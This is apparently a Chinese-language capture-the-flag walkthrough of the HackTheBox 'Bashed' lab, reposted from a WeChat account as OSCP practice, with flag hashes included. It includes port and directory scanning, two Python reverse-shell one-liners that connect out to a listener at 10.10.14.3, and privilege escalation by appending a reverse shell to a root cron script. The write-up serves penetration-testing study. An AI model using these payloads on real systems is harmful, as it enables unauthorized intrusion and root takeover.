网络畅通
端口扫描
nmap 10.10.10.68
只有一个80
给了一个github地址,还有一个链接,类似php大马,直接访问404
目录扫描
feroxbuster -u http://10.10.10.68/ -x sh,cgi,pl,html,java,php
在dev目录发现了命令执行
6cdbacaaa253542f2aad211ad011aea4
反弹shell
发现python可以成功
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
查看权限分配
sudo -l
显示有一个用户,没密码
sudo -u scriptmanager /bin/bash
但也没权限查看root目录
发现了脚本目录,里面有个脚本
脚本文件是普通用户,生成的txt确是root
查看定时任务
三个地方没看到,此时刷新ls,发现txt有多了
猜测可能存在定时任务,只是权限不够,看不了
获取flag
还是用py的反弹shell
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);" >> test.py
c54332d45d7adadc2a67ad68998fc9bb
查看定时任务,进入到脚本目录下,然后遍历以py结尾的文件,然后执行。
原文始发于微信公众号(轩公子谈技术):OSCP-Bashed靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论